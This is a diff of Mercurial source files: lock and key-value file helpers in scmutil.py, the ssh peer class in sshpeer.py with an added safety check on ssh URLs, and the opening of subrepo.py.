986 if environ is None:
986 if environ is None:
987 environ = {}
987 environ = {}
988 with lock.inherit() as locker:
988 with lock.inherit() as locker:
989 environ[envvar] = locker
989 environ[envvar] = locker
990 return repo.ui.system(cmd, environ=environ, *args, **kwargs)
990 return repo.ui.system(cmd, environ=environ, *args, **kwargs)
991
991
992 def wlocksub(repo, cmd, *args, **kwargs):
992 def wlocksub(repo, cmd, *args, **kwargs):
993 """run cmd as a subprocess that allows inheriting repo's wlock
993 """run cmd as a subprocess that allows inheriting repo's wlock
994
994
995 This can only be called while the wlock is held. This takes all the
995 This can only be called while the wlock is held. This takes all the
996 arguments that ui.system does, and returns the exit code of the
996 arguments that ui.system does, and returns the exit code of the
997 subprocess."""
997 subprocess."""
998 return _locksub(repo, repo.currentwlock(), 'HG_WLOCK_LOCKER', cmd, *args,
998 return _locksub(repo, repo.currentwlock(), 'HG_WLOCK_LOCKER', cmd, *args,
999 **kwargs)
999 **kwargs)
1000
1000
1001 def gdinitconfig(ui):
1001 def gdinitconfig(ui):
1002 """helper function to know if a repo should be created as general delta
1002 """helper function to know if a repo should be created as general delta
1003 """
1003 """
1004 # experimental config: format.generaldelta
1004 # experimental config: format.generaldelta
1005 return (ui.configbool('format', 'generaldelta')
1005 return (ui.configbool('format', 'generaldelta')
1006 or ui.configbool('format', 'usegeneraldelta'))
1006 or ui.configbool('format', 'usegeneraldelta'))
1007
1007
1008 def gddeltaconfig(ui):
1008 def gddeltaconfig(ui):
1009 """helper function to know if incoming delta should be optimised
1009 """helper function to know if incoming delta should be optimised
1010 """
1010 """
1011 # experimental config: format.generaldelta
1011 # experimental config: format.generaldelta
1012 return ui.configbool('format', 'generaldelta')
1012 return ui.configbool('format', 'generaldelta')
1013
1013
1014 class simplekeyvaluefile(object):
1014 class simplekeyvaluefile(object):
1015 """A simple file with key=value lines
1015 """A simple file with key=value lines
1016
1016
1017 Keys must be alphanumerics and start with a letter, values must not
1017 Keys must be alphanumerics and start with a letter, values must not
1018 contain '\n' characters"""
1018 contain '\n' characters"""
1019 firstlinekey = '__firstline'
1019 firstlinekey = '__firstline'
1020
1020
1021 def __init__(self, vfs, path, keys=None):
1021 def __init__(self, vfs, path, keys=None):
1022 self.vfs = vfs
1022 self.vfs = vfs
1023 self.path = path
1023 self.path = path
1024
1024
1025 def read(self, firstlinenonkeyval=False):
1025 def read(self, firstlinenonkeyval=False):
1026 """Read the contents of a simple key-value file
1026 """Read the contents of a simple key-value file
1027
1027
1028 'firstlinenonkeyval' indicates whether the first line of file should
1028 'firstlinenonkeyval' indicates whether the first line of file should
1029 be treated as a key-value pair or reuturned fully under the
1029 be treated as a key-value pair or reuturned fully under the
1030 __firstline key."""
1030 __firstline key."""
1031 lines = self.vfs.readlines(self.path)
1031 lines = self.vfs.readlines(self.path)
1032 d = {}
1032 d = {}
1033 if firstlinenonkeyval:
1033 if firstlinenonkeyval:
1034 if not lines:
1034 if not lines:
1035 e = _("empty simplekeyvalue file")
1035 e = _("empty simplekeyvalue file")
1036 raise error.CorruptedState(e)
1036 raise error.CorruptedState(e)
1037 # we don't want to include '\n' in the __firstline
1037 # we don't want to include '\n' in the __firstline
1038 d[self.firstlinekey] = lines[0][:-1]
1038 d[self.firstlinekey] = lines[0][:-1]
1039 del lines[0]
1039 del lines[0]
1040
1040
1041 try:
1041 try:
1042 # the 'if line.strip()' part prevents us from failing on empty
1042 # the 'if line.strip()' part prevents us from failing on empty
1043 # lines which only contain '\n' therefore are not skipped
1043 # lines which only contain '\n' therefore are not skipped
1044 # by 'if line'
1044 # by 'if line'
1045 updatedict = dict(line[:-1].split('=', 1) for line in lines
1045 updatedict = dict(line[:-1].split('=', 1) for line in lines
1046 if line.strip())
1046 if line.strip())
1047 if self.firstlinekey in updatedict:
1047 if self.firstlinekey in updatedict:
1048 e = _("%r can't be used as a key")
1048 e = _("%r can't be used as a key")
1049 raise error.CorruptedState(e % self.firstlinekey)
1049 raise error.CorruptedState(e % self.firstlinekey)
1050 d.update(updatedict)
1050 d.update(updatedict)
1051 except ValueError as e:
1051 except ValueError as e:
1052 raise error.CorruptedState(str(e))
1052 raise error.CorruptedState(str(e))
1053 return d
1053 return d
1054
1054
1055 def write(self, data, firstline=None):
1055 def write(self, data, firstline=None):
1056 """Write key=>value mapping to a file
1056 """Write key=>value mapping to a file
1057 data is a dict. Keys must be alphanumerical and start with a letter.
1057 data is a dict. Keys must be alphanumerical and start with a letter.
1058 Values must not contain newline characters.
1058 Values must not contain newline characters.
1059
1059
1060 If 'firstline' is not None, it is written to file before
1060 If 'firstline' is not None, it is written to file before
1061 everything else, as it is, not in a key=value form"""
1061 everything else, as it is, not in a key=value form"""
1062 lines = []
1062 lines = []
1063 if firstline is not None:
1063 if firstline is not None:
1064 lines.append('%s\n' % firstline)
1064 lines.append('%s\n' % firstline)
1065
1065
1066 for k, v in data.items():
1066 for k, v in data.items():
1067 if k == self.firstlinekey:
1067 if k == self.firstlinekey:
1068 e = "key name '%s' is reserved" % self.firstlinekey
1068 e = "key name '%s' is reserved" % self.firstlinekey
1069 raise error.ProgrammingError(e)
1069 raise error.ProgrammingError(e)
1070 if not k[0].isalpha():
1070 if not k[0].isalpha():
1071 e = "keys must start with a letter in a key-value file"
1071 e = "keys must start with a letter in a key-value file"
1072 raise error.ProgrammingError(e)
1072 raise error.ProgrammingError(e)
1073 if not k.isalnum():
1073 if not k.isalnum():
1074 e = "invalid key name in a simple key-value file"
1074 e = "invalid key name in a simple key-value file"
1075 raise error.ProgrammingError(e)
1075 raise error.ProgrammingError(e)
1076 if '\n' in v:
1076 if '\n' in v:
1077 e = "invalid value in a simple key-value file"
1077 e = "invalid value in a simple key-value file"
1078 raise error.ProgrammingError(e)
1078 raise error.ProgrammingError(e)
1079 lines.append("%s=%s\n" % (k, v))
1079 lines.append("%s=%s\n" % (k, v))
1080 with self.vfs(self.path, mode='wb', atomictemp=True) as fp:
1080 with self.vfs(self.path, mode='wb', atomictemp=True) as fp:
1081 fp.write(''.join(lines))
1081 fp.write(''.join(lines))
1082
1082
1083 _reportobsoletedsource = [
1083 _reportobsoletedsource = [
1084 'debugobsolete',
1084 'debugobsolete',
1085 'pull',
1085 'pull',
1086 'push',
1086 'push',
1087 'serve',
1087 'serve',
1088 'unbundle',
1088 'unbundle',
1089 ]
1089 ]
1090
1090
1091 def registersummarycallback(repo, otr, txnname=''):
1091 def registersummarycallback(repo, otr, txnname=''):
1092 """register a callback to issue a summary after the transaction is closed
1092 """register a callback to issue a summary after the transaction is closed
1093 """
1093 """
1094 for source in _reportobsoletedsource:
1094 for source in _reportobsoletedsource:
1095 if txnname.startswith(source):
1095 if txnname.startswith(source):
1096 reporef = weakref.ref(repo)
1096 reporef = weakref.ref(repo)
1097 def reportsummary(tr):
1097 def reportsummary(tr):
1098 """the actual callback reporting the summary"""
1098 """the actual callback reporting the summary"""
1099 repo = reporef()
1099 repo = reporef()
1100 obsoleted = obsutil.getobsoleted(repo, tr)
1100 obsoleted = obsutil.getobsoleted(repo, tr)
1101 if obsoleted:
1101 if obsoleted:
1102 repo.ui.status(_('obsoleted %i changesets\n')
1102 repo.ui.status(_('obsoleted %i changesets\n')
1103 % len(obsoleted))
1103 % len(obsoleted))
1104 otr.addpostclose('00-txnreport', reportsummary)
1104 otr.addpostclose('00-txnreport', reportsummary)
1105 break
1105 break
@@ -1,325 +1,324 b''
1 # sshpeer.py - ssh repository proxy class for mercurial
1 # sshpeer.py - ssh repository proxy class for mercurial
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import re
10 import re
11
11
12 from .i18n import _
12 from .i18n import _
13 from . import (
13 from . import (
14 error,
14 error,
15 pycompat,
15 pycompat,
16 util,
16 util,
17 wireproto,
17 wireproto,
18 )
18 )
19
19
20 def _serverquote(s):
20 def _serverquote(s):
21 if not s:
21 if not s:
22 return s
22 return s
23 '''quote a string for the remote shell ... which we assume is sh'''
23 '''quote a string for the remote shell ... which we assume is sh'''
24 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
24 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
25 return s
25 return s
26 return "'%s'" % s.replace("'", "'\\''")
26 return "'%s'" % s.replace("'", "'\\''")
27
27
28 def _forwardoutput(ui, pipe):
28 def _forwardoutput(ui, pipe):
29 """display all data currently available on pipe as remote output.
29 """display all data currently available on pipe as remote output.
30
30
31 This is non blocking."""
31 This is non blocking."""
32 s = util.readpipe(pipe)
32 s = util.readpipe(pipe)
33 if s:
33 if s:
34 for l in s.splitlines():
34 for l in s.splitlines():
35 ui.status(_("remote: "), l, '\n')
35 ui.status(_("remote: "), l, '\n')
36
36
37 class doublepipe(object):
37 class doublepipe(object):
38 """Operate a side-channel pipe in addition of a main one
38 """Operate a side-channel pipe in addition of a main one
39
39
40 The side-channel pipe contains server output to be forwarded to the user
40 The side-channel pipe contains server output to be forwarded to the user
41 input. The double pipe will behave as the "main" pipe, but will ensure the
41 input. The double pipe will behave as the "main" pipe, but will ensure the
42 content of the "side" pipe is properly processed while we wait for blocking
42 content of the "side" pipe is properly processed while we wait for blocking
43 call on the "main" pipe.
43 call on the "main" pipe.
44
44
45 If large amounts of data are read from "main", the forward will cease after
45 If large amounts of data are read from "main", the forward will cease after
46 the first bytes start to appear. This simplifies the implementation
46 the first bytes start to appear. This simplifies the implementation
47 without affecting actual output of sshpeer too much as we rarely issue
47 without affecting actual output of sshpeer too much as we rarely issue
48 large read for data not yet emitted by the server.
48 large read for data not yet emitted by the server.
49
49
50 The main pipe is expected to be a 'bufferedinputpipe' from the util module
50 The main pipe is expected to be a 'bufferedinputpipe' from the util module
51 that handle all the os specific bits. This class lives in this module
51 that handle all the os specific bits. This class lives in this module
52 because it focus on behavior specific to the ssh protocol."""
52 because it focus on behavior specific to the ssh protocol."""
53
53
54 def __init__(self, ui, main, side):
54 def __init__(self, ui, main, side):
55 self._ui = ui
55 self._ui = ui
56 self._main = main
56 self._main = main
57 self._side = side
57 self._side = side
58
58
59 def _wait(self):
59 def _wait(self):
60 """wait until some data are available on main or side
60 """wait until some data are available on main or side
61
61
62 return a pair of boolean (ismainready, issideready)
62 return a pair of boolean (ismainready, issideready)
63
63
64 (This will only wait for data if the setup is supported by `util.poll`)
64 (This will only wait for data if the setup is supported by `util.poll`)
65 """
65 """
66 if getattr(self._main, 'hasbuffer', False): # getattr for classic pipe
66 if getattr(self._main, 'hasbuffer', False): # getattr for classic pipe
67 return (True, True) # main has data, assume side is worth poking at.
67 return (True, True) # main has data, assume side is worth poking at.
68 fds = [self._main.fileno(), self._side.fileno()]
68 fds = [self._main.fileno(), self._side.fileno()]
69 try:
69 try:
70 act = util.poll(fds)
70 act = util.poll(fds)
71 except NotImplementedError:
71 except NotImplementedError:
72 # non supported yet case, assume all have data.
72 # non supported yet case, assume all have data.
73 act = fds
73 act = fds
74 return (self._main.fileno() in act, self._side.fileno() in act)
74 return (self._main.fileno() in act, self._side.fileno() in act)
75
75
76 def write(self, data):
76 def write(self, data):
77 return self._call('write', data)
77 return self._call('write', data)
78
78
79 def read(self, size):
79 def read(self, size):
80 r = self._call('read', size)
80 r = self._call('read', size)
81 if size != 0 and not r:
81 if size != 0 and not r:
82 # We've observed a condition that indicates the
82 # We've observed a condition that indicates the
83 # stdout closed unexpectedly. Check stderr one
83 # stdout closed unexpectedly. Check stderr one
84 # more time and snag anything that's there before
84 # more time and snag anything that's there before
85 # letting anyone know the main part of the pipe
85 # letting anyone know the main part of the pipe
86 # closed prematurely.
86 # closed prematurely.
87 _forwardoutput(self._ui, self._side)
87 _forwardoutput(self._ui, self._side)
88 return r
88 return r
89
89
90 def readline(self):
90 def readline(self):
91 return self._call('readline')
91 return self._call('readline')
92
92
93 def _call(self, methname, data=None):
93 def _call(self, methname, data=None):
94 """call <methname> on "main", forward output of "side" while blocking
94 """call <methname> on "main", forward output of "side" while blocking
95 """
95 """
96 # data can be '' or 0
96 # data can be '' or 0
97 if (data is not None and not data) or self._main.closed:
97 if (data is not None and not data) or self._main.closed:
98 _forwardoutput(self._ui, self._side)
98 _forwardoutput(self._ui, self._side)
99 return ''
99 return ''
100 while True:
100 while True:
101 mainready, sideready = self._wait()
101 mainready, sideready = self._wait()
102 if sideready:
102 if sideready:
103 _forwardoutput(self._ui, self._side)
103 _forwardoutput(self._ui, self._side)
104 if mainready:
104 if mainready:
105 meth = getattr(self._main, methname)
105 meth = getattr(self._main, methname)
106 if data is None:
106 if data is None:
107 return meth()
107 return meth()
108 else:
108 else:
109 return meth(data)
109 return meth(data)
110
110
111 def close(self):
111 def close(self):
112 return self._main.close()
112 return self._main.close()
113
113
114 def flush(self):
114 def flush(self):
115 return self._main.flush()
115 return self._main.flush()
116
116
117 class sshpeer(wireproto.wirepeer):
117 class sshpeer(wireproto.wirepeer):
118 def __init__(self, ui, path, create=False):
118 def __init__(self, ui, path, create=False):
119 self._url = path
119 self._url = path
120 self.ui = ui
120 self.ui = ui
121 self.pipeo = self.pipei = self.pipee = None
121 self.pipeo = self.pipei = self.pipee = None
122
122
123 u = util.url(path, parsequery=False, parsefragment=False)
123 u = util.url(path, parsequery=False, parsefragment=False)
124 if u.scheme != 'ssh' or not u.host or u.path is None:
124 if u.scheme != 'ssh' or not u.host or u.path is None:
125 self._abort(error.RepoError(_("couldn't parse location %s") % path))
125 self._abort(error.RepoError(_("couldn't parse location %s") % path))
126
126
127 util.checksafessh(path)
128
127 self.user = u.user
129 self.user = u.user
128 if u.passwd is not None:
130 if u.passwd is not None:
129 self._abort(error.RepoError(_("password in URL not supported")))
131 self._abort(error.RepoError(_("password in URL not supported")))
130 self.host = u.host
132 self.host = u.host
131 self.port = u.port
133 self.port = u.port
132 self.path = u.path or "."
134 self.path = u.path or "."
133
135
134 sshcmd = self.ui.config("ui", "ssh")
136 sshcmd = self.ui.config("ui", "ssh")
135 remotecmd = self.ui.config("ui", "remotecmd")
137 remotecmd = self.ui.config("ui", "remotecmd")
136
138
137 args = util.sshargs(sshcmd,
139 args = util.sshargs(sshcmd, self.host, self.user, self.port)
138 _serverquote(self.host),
139 _serverquote(self.user),
140 _serverquote(self.port))
141
140
142 if create:
141 if create:
143 cmd = '%s %s %s' % (sshcmd, args,
142 cmd = '%s %s %s' % (sshcmd, args,
144 util.shellquote("%s init %s" %
143 util.shellquote("%s init %s" %
145 (_serverquote(remotecmd), _serverquote(self.path))))
144 (_serverquote(remotecmd), _serverquote(self.path))))
146 ui.debug('running %s\n' % cmd)
145 ui.debug('running %s\n' % cmd)
147 res = ui.system(cmd, blockedtag='sshpeer')
146 res = ui.system(cmd, blockedtag='sshpeer')
148 if res != 0:
147 if res != 0:
149 self._abort(error.RepoError(_("could not create remote repo")))
148 self._abort(error.RepoError(_("could not create remote repo")))
150
149
151 self._validaterepo(sshcmd, args, remotecmd)
150 self._validaterepo(sshcmd, args, remotecmd)
152
151
153 def url(self):
152 def url(self):
154 return self._url
153 return self._url
155
154
156 def _validaterepo(self, sshcmd, args, remotecmd):
155 def _validaterepo(self, sshcmd, args, remotecmd):
157 # cleanup up previous run
156 # cleanup up previous run
158 self.cleanup()
157 self.cleanup()
159
158
160 cmd = '%s %s %s' % (sshcmd, args,
159 cmd = '%s %s %s' % (sshcmd, args,
161 util.shellquote("%s -R %s serve --stdio" %
160 util.shellquote("%s -R %s serve --stdio" %
162 (_serverquote(remotecmd), _serverquote(self.path))))
161 (_serverquote(remotecmd), _serverquote(self.path))))
163 self.ui.debug('running %s\n' % cmd)
162 self.ui.debug('running %s\n' % cmd)
164 cmd = util.quotecommand(cmd)
163 cmd = util.quotecommand(cmd)
165
164
166 # while self.subprocess isn't used, having it allows the subprocess to
165 # while self.subprocess isn't used, having it allows the subprocess to
167 # to clean up correctly later
166 # to clean up correctly later
168 #
167 #
169 # no buffer allow the use of 'select'
168 # no buffer allow the use of 'select'
170 # feel free to remove buffering and select usage when we ultimately
169 # feel free to remove buffering and select usage when we ultimately
171 # move to threading.
170 # move to threading.
172 sub = util.popen4(cmd, bufsize=0)
171 sub = util.popen4(cmd, bufsize=0)
173 self.pipeo, self.pipei, self.pipee, self.subprocess = sub
172 self.pipeo, self.pipei, self.pipee, self.subprocess = sub
174
173
175 self.pipei = util.bufferedinputpipe(self.pipei)
174 self.pipei = util.bufferedinputpipe(self.pipei)
176 self.pipei = doublepipe(self.ui, self.pipei, self.pipee)
175 self.pipei = doublepipe(self.ui, self.pipei, self.pipee)
177 self.pipeo = doublepipe(self.ui, self.pipeo, self.pipee)
176 self.pipeo = doublepipe(self.ui, self.pipeo, self.pipee)
178
177
179 # skip any noise generated by remote shell
178 # skip any noise generated by remote shell
180 self._callstream("hello")
179 self._callstream("hello")
181 r = self._callstream("between", pairs=("%s-%s" % ("0"*40, "0"*40)))
180 r = self._callstream("between", pairs=("%s-%s" % ("0"*40, "0"*40)))
182 lines = ["", "dummy"]
181 lines = ["", "dummy"]
183 max_noise = 500
182 max_noise = 500
184 while lines[-1] and max_noise:
183 while lines[-1] and max_noise:
185 l = r.readline()
184 l = r.readline()
186 self.readerr()
185 self.readerr()
187 if lines[-1] == "1\n" and l == "\n":
186 if lines[-1] == "1\n" and l == "\n":
188 break
187 break
189 if l:
188 if l:
190 self.ui.debug("remote: ", l)
189 self.ui.debug("remote: ", l)
191 lines.append(l)
190 lines.append(l)
192 max_noise -= 1
191 max_noise -= 1
193 else:
192 else:
194 self._abort(error.RepoError(_('no suitable response from '
193 self._abort(error.RepoError(_('no suitable response from '
195 'remote hg')))
194 'remote hg')))
196
195
197 self._caps = set()
196 self._caps = set()
198 for l in reversed(lines):
197 for l in reversed(lines):
199 if l.startswith("capabilities:"):
198 if l.startswith("capabilities:"):
200 self._caps.update(l[:-1].split(":")[1].split())
199 self._caps.update(l[:-1].split(":")[1].split())
201 break
200 break
202
201
203 def _capabilities(self):
202 def _capabilities(self):
204 return self._caps
203 return self._caps
205
204
206 def readerr(self):
205 def readerr(self):
207 _forwardoutput(self.ui, self.pipee)
206 _forwardoutput(self.ui, self.pipee)
208
207
209 def _abort(self, exception):
208 def _abort(self, exception):
210 self.cleanup()
209 self.cleanup()
211 raise exception
210 raise exception
212
211
213 def cleanup(self):
212 def cleanup(self):
214 if self.pipeo is None:
213 if self.pipeo is None:
215 return
214 return
216 self.pipeo.close()
215 self.pipeo.close()
217 self.pipei.close()
216 self.pipei.close()
218 try:
217 try:
219 # read the error descriptor until EOF
218 # read the error descriptor until EOF
220 for l in self.pipee:
219 for l in self.pipee:
221 self.ui.status(_("remote: "), l)
220 self.ui.status(_("remote: "), l)
222 except (IOError, ValueError):
221 except (IOError, ValueError):
223 pass
222 pass
224 self.pipee.close()
223 self.pipee.close()
225
224
226 __del__ = cleanup
225 __del__ = cleanup
227
226
228 def _submitbatch(self, req):
227 def _submitbatch(self, req):
229 rsp = self._callstream("batch", cmds=wireproto.encodebatchcmds(req))
228 rsp = self._callstream("batch", cmds=wireproto.encodebatchcmds(req))
230 available = self._getamount()
229 available = self._getamount()
231 # TODO this response parsing is probably suboptimal for large
230 # TODO this response parsing is probably suboptimal for large
232 # batches with large responses.
231 # batches with large responses.
233 toread = min(available, 1024)
232 toread = min(available, 1024)
234 work = rsp.read(toread)
233 work = rsp.read(toread)
235 available -= toread
234 available -= toread
236 chunk = work
235 chunk = work
237 while chunk:
236 while chunk:
238 while ';' in work:
237 while ';' in work:
239 one, work = work.split(';', 1)
238 one, work = work.split(';', 1)
240 yield wireproto.unescapearg(one)
239 yield wireproto.unescapearg(one)
241 toread = min(available, 1024)
240 toread = min(available, 1024)
242 chunk = rsp.read(toread)
241 chunk = rsp.read(toread)
243 available -= toread
242 available -= toread
244 work += chunk
243 work += chunk
245 yield wireproto.unescapearg(work)
244 yield wireproto.unescapearg(work)
246
245
247 def _callstream(self, cmd, **args):
246 def _callstream(self, cmd, **args):
248 args = pycompat.byteskwargs(args)
247 args = pycompat.byteskwargs(args)
249 self.ui.debug("sending %s command\n" % cmd)
248 self.ui.debug("sending %s command\n" % cmd)
250 self.pipeo.write("%s\n" % cmd)
249 self.pipeo.write("%s\n" % cmd)
251 _func, names = wireproto.commands[cmd]
250 _func, names = wireproto.commands[cmd]
252 keys = names.split()
251 keys = names.split()
253 wireargs = {}
252 wireargs = {}
254 for k in keys:
253 for k in keys:
255 if k == '*':
254 if k == '*':
256 wireargs['*'] = args
255 wireargs['*'] = args
257 break
256 break
258 else:
257 else:
259 wireargs[k] = args[k]
258 wireargs[k] = args[k]
260 del args[k]
259 del args[k]
261 for k, v in sorted(wireargs.iteritems()):
260 for k, v in sorted(wireargs.iteritems()):
262 self.pipeo.write("%s %d\n" % (k, len(v)))
261 self.pipeo.write("%s %d\n" % (k, len(v)))
263 if isinstance(v, dict):
262 if isinstance(v, dict):
264 for dk, dv in v.iteritems():
263 for dk, dv in v.iteritems():
265 self.pipeo.write("%s %d\n" % (dk, len(dv)))
264 self.pipeo.write("%s %d\n" % (dk, len(dv)))
266 self.pipeo.write(dv)
265 self.pipeo.write(dv)
267 else:
266 else:
268 self.pipeo.write(v)
267 self.pipeo.write(v)
269 self.pipeo.flush()
268 self.pipeo.flush()
270
269
271 return self.pipei
270 return self.pipei
272
271
273 def _callcompressable(self, cmd, **args):
272 def _callcompressable(self, cmd, **args):
274 return self._callstream(cmd, **args)
273 return self._callstream(cmd, **args)
275
274
276 def _call(self, cmd, **args):
275 def _call(self, cmd, **args):
277 self._callstream(cmd, **args)
276 self._callstream(cmd, **args)
278 return self._recv()
277 return self._recv()
279
278
280 def _callpush(self, cmd, fp, **args):
279 def _callpush(self, cmd, fp, **args):
281 r = self._call(cmd, **args)
280 r = self._call(cmd, **args)
282 if r:
281 if r:
283 return '', r
282 return '', r
284 for d in iter(lambda: fp.read(4096), ''):
283 for d in iter(lambda: fp.read(4096), ''):
285 self._send(d)
284 self._send(d)
286 self._send("", flush=True)
285 self._send("", flush=True)
287 r = self._recv()
286 r = self._recv()
288 if r:
287 if r:
289 return '', r
288 return '', r
290 return self._recv(), ''
289 return self._recv(), ''
291
290
292 def _calltwowaystream(self, cmd, fp, **args):
291 def _calltwowaystream(self, cmd, fp, **args):
293 r = self._call(cmd, **args)
292 r = self._call(cmd, **args)
294 if r:
293 if r:
295 # XXX needs to be made better
294 # XXX needs to be made better
296 raise error.Abort(_('unexpected remote reply: %s') % r)
295 raise error.Abort(_('unexpected remote reply: %s') % r)
297 for d in iter(lambda: fp.read(4096), ''):
296 for d in iter(lambda: fp.read(4096), ''):
298 self._send(d)
297 self._send(d)
299 self._send("", flush=True)
298 self._send("", flush=True)
300 return self.pipei
299 return self.pipei
301
300
302 def _getamount(self):
301 def _getamount(self):
303 l = self.pipei.readline()
302 l = self.pipei.readline()
304 if l == '\n':
303 if l == '\n':
305 self.readerr()
304 self.readerr()
306 msg = _('check previous remote output')
305 msg = _('check previous remote output')
307 self._abort(error.OutOfBandError(hint=msg))
306 self._abort(error.OutOfBandError(hint=msg))
308 self.readerr()
307 self.readerr()
309 try:
308 try:
310 return int(l)
309 return int(l)
311 except ValueError:
310 except ValueError:
312 self._abort(error.ResponseError(_("unexpected response:"), l))
311 self._abort(error.ResponseError(_("unexpected response:"), l))
313
312
314 def _recv(self):
313 def _recv(self):
315 return self.pipei.read(self._getamount())
314 return self.pipei.read(self._getamount())
316
315
317 def _send(self, data, flush=False):
316 def _send(self, data, flush=False):
318 self.pipeo.write("%d\n" % len(data))
317 self.pipeo.write("%d\n" % len(data))
319 if data:
318 if data:
320 self.pipeo.write(data)
319 self.pipeo.write(data)
321 if flush:
320 if flush:
322 self.pipeo.flush()
321 self.pipeo.flush()
323 self.readerr()
322 self.readerr()
324
323
325 instance = sshpeer
324 instance = sshpeer
@@ -1,1995 +1,2002 b''
1 # subrepo.py - sub-repository handling for Mercurial
1 # subrepo.py - sub-repository handling for Mercurial
2 #
2 #
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import copy
10 import copy
11 import errno
11 import errno
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import posixpath
14 import posixpath
15 import re
15 import re
16 import stat
16 import stat
17 import subprocess
17 import subprocess
18 import sys
18 import sys
19 import tarfile
19 import tarfile
20 import xml.dom.minidom
20 import xml.dom.minidom
21
21
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 cmdutil,
25 cmdutil,
26 config,
26 config,
27 encoding,
27 encoding,
28 error,
28 error,
29 exchange,
29 exchange,
30 filemerge,
30 filemerge,
31 match as matchmod,
31 match as matchmod,
32 node,
32 node,
33 pathutil,
33 pathutil,
34 phases,
34 phases,
35 pycompat,
35 pycompat,
36 scmutil,
36 scmutil,
37 util,
37 util,
38 vfs as vfsmod,
38 vfs as vfsmod,
39 )
39 )
40
40
41 hg = None
41 hg = None
42 propertycache = util.propertycache
42 propertycache = util.propertycache
43
43
44 nullstate = ('', '', 'empty')
44 nullstate = ('', '', 'empty')
45
45
46 def _expandedabspath(path):
46 def _expandedabspath(path):
47 '''
47 '''
48 get a path or url and if it is a path expand it and return an absolute path
48 get a path or url and if it is a path expand it and return an absolute path
49 '''
49 '''
50 expandedpath = util.urllocalpath(util.expandpath(path))
50 expandedpath = util.urllocalpath(util.expandpath(path))
51 u = util.url(expandedpath)
51 u = util.url(expandedpath)
52 if not u.scheme:
52 if not u.scheme:
53 path = util.normpath(os.path.abspath(u.path))
53 path = util.normpath(os.path.abspath(u.path))
54 return path
54 return path
55
55
56 def _getstorehashcachename(remotepath):
56 def _getstorehashcachename(remotepath):
57 '''get a unique filename for the store hash cache of a remote repository'''
57 '''get a unique filename for the store hash cache of a remote repository'''
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
59
59
60 class SubrepoAbort(error.Abort):
60 class SubrepoAbort(error.Abort):
61 """Exception class used to avoid handling a subrepo error more than once"""
61 """Exception class used to avoid handling a subrepo error more than once"""
62 def __init__(self, *args, **kw):
62 def __init__(self, *args, **kw):
63 self.subrepo = kw.pop('subrepo', None)
63 self.subrepo = kw.pop('subrepo', None)
64 self.cause = kw.pop('cause', None)
64 self.cause = kw.pop('cause', None)
65 error.Abort.__init__(self, *args, **kw)
65 error.Abort.__init__(self, *args, **kw)
66
66
67 def annotatesubrepoerror(func):
67 def annotatesubrepoerror(func):
68 def decoratedmethod(self, *args, **kargs):
68 def decoratedmethod(self, *args, **kargs):
69 try:
69 try:
70 res = func(self, *args, **kargs)
70 res = func(self, *args, **kargs)
71 except SubrepoAbort as ex:
71 except SubrepoAbort as ex:
72 # This exception has already been handled
72 # This exception has already been handled
73 raise ex
73 raise ex
74 except error.Abort as ex:
74 except error.Abort as ex:
75 subrepo = subrelpath(self)
75 subrepo = subrelpath(self)
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
77 # avoid handling this exception by raising a SubrepoAbort exception
77 # avoid handling this exception by raising a SubrepoAbort exception
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
79 cause=sys.exc_info())
79 cause=sys.exc_info())
80 return res
80 return res
81 return decoratedmethod
81 return decoratedmethod
82
82
83 def state(ctx, ui):
83 def state(ctx, ui):
84 """return a state dict, mapping subrepo paths configured in .hgsub
84 """return a state dict, mapping subrepo paths configured in .hgsub
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
86 (key in types dict))
86 (key in types dict))
87 """
87 """
88 p = config.config()
88 p = config.config()
89 repo = ctx.repo()
89 repo = ctx.repo()
90 def read(f, sections=None, remap=None):
90 def read(f, sections=None, remap=None):
91 if f in ctx:
91 if f in ctx:
92 try:
92 try:
93 data = ctx[f].data()
93 data = ctx[f].data()
94 except IOError as err:
94 except IOError as err:
95 if err.errno != errno.ENOENT:
95 if err.errno != errno.ENOENT:
96 raise
96 raise
97 # handle missing subrepo spec files as removed
97 # handle missing subrepo spec files as removed
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
99 repo.pathto(f))
99 repo.pathto(f))
100 return
100 return
101 p.parse(f, data, sections, remap, read)
101 p.parse(f, data, sections, remap, read)
102 else:
102 else:
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
104 repo.pathto(f))
104 repo.pathto(f))
105 if '.hgsub' in ctx:
105 if '.hgsub' in ctx:
106 read('.hgsub')
106 read('.hgsub')
107
107
108 for path, src in ui.configitems('subpaths'):
108 for path, src in ui.configitems('subpaths'):
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
110
110
111 rev = {}
111 rev = {}
112 if '.hgsubstate' in ctx:
112 if '.hgsubstate' in ctx:
113 try:
113 try:
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
